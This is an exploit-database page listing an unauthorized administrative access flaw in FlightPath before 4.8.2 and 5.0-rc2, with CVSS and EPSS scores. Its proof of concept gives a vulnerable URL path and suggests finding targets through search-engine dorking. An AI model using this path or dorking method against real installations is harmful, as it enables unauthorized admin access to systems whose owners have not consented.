Advertisement






FlightPath < 4.8.2 / < 5.0-rc2 - Unauthorized Administrative Access Vulnerability

CVE Category Price Severity
N/A CWE-285 $1000 High
Author Risk Exploitation Type Date
Exploit Alert Team High Remote 2019-07-16
CVSS EPSS EPSSP
CVSS:3.1/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019070070

Below is a copy:

FlightPath < 4.8.2 / < 5.0-rc2 - Unauthorized Administrative Access Vulnerability
====================================================================================================================================
| # Title     : FlightPath < 4.8.2 / < 5.0-rc2 - Unauthorized Administrative Access Vulnerability                                  |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               |
| # Vendor    : http://getflightpath.com                                                                                           |  
| # Dork      :                                                                                                                    |
====================================================================================================================================

poc :


[+] Dorking n Google Or Other Search Enggine.

[+] Use payload : /tools/course-search/

[+] http://getflightpath.com/sites/getflightpath/demo/4x/flightpath/tools/course-search

Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.